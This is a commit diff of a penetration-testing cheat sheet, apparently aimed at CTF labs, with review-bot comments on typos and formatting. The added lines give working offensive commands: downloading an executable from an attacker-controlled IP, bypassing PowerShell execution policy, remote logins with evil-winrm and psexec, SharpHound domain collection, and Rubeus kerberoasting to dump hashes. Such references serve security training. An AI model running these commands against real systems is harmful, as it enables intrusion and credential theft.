Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-03-08 04:24:10 +05:00 committed by GitHub
parent 1ba9e1a96b
commit e49308c98b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

@ -229,10 +229,6 @@ dir /a:h `show only hidden files`<br/>
`powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe`<br />
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module
## List Drives
`wmic logicaldisk get caption`
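Review bot: the lines this hunk removes (the `### Active Directory` heading, the `powershell -ep bypass` line and the `. .\PowerView.ps1` import; the header counts four removed lines but only three are visible here, so the fourth is presumably a blank line) reappear verbatim in the next hunk, so this is a relocation rather than a deletion; the commit message "Update Cheat Sheet.md" should say that the section was moved so that readers of the history do not take it for removed content.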
@ -240,6 +236,32 @@ dir /a:h `show only hidden files`<br/>
* $file = Import-Clixml -Path <path_to_file>
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
### Evil-winrm
`evil-winrm -i 10.10.213.169 -u <USER> -p '<PASS>'`
### Psexec.py
` python psexec.py DOMAIN/USER:PASS@IP`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module
##### Using Bloodhound
* Upload `Sharphound.ps1` (https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
* Then `. .\Sharhound.ps1`
* `Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN-NAME -ZipFileName loot.zip` Domain name can be found by running `Get-ADDomain` and look for result
<img src="https://imgur.com/NxWapei.png"/>
* This command will give an archive which you will have to simply drag and drop on the bloodhound GUI running on your local machine and then quries for kerberoastable accounts or getting more information
##### Using Rubeus
* Download rubeus `https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe`
* Documentation `https://github.com/GhostPack/Rubeus`
* Transfer rubeus.exe on targeted windows machine and run `.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt` to get a hash
# Msfvenom
### List All Payloads
msfvenom -l payloads
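Review bot: the Bloodhound step `. .\Sharhound.ps1` does not match the file name `Sharphound.ps1` given in the bullet above it, so the dot-source will fail with a file-not-found error; fix the spelling (the upstream file is `SharpHound.ps1`, which only matters if the file passes through a case-sensitive host). Smaller points in the same hunk: `quries` should be `queries`; the Evil-winrm line hard-codes `10.10.213.169` while the rest of the sheet uses placeholders such as `<USER>` and `<PASS>`, so `<IP>` would be consistent; the Psexec.py example has a stray leading space inside the backticks; the heading level jumps from `###` to `#####` for the Bloodhound and Rubeus subsections, so `####` would keep the hierarchy; and the `<img>` for the `Get-ADDomain` output points at imgur rather than an image committed to the repository, so it will break if that upload disappears.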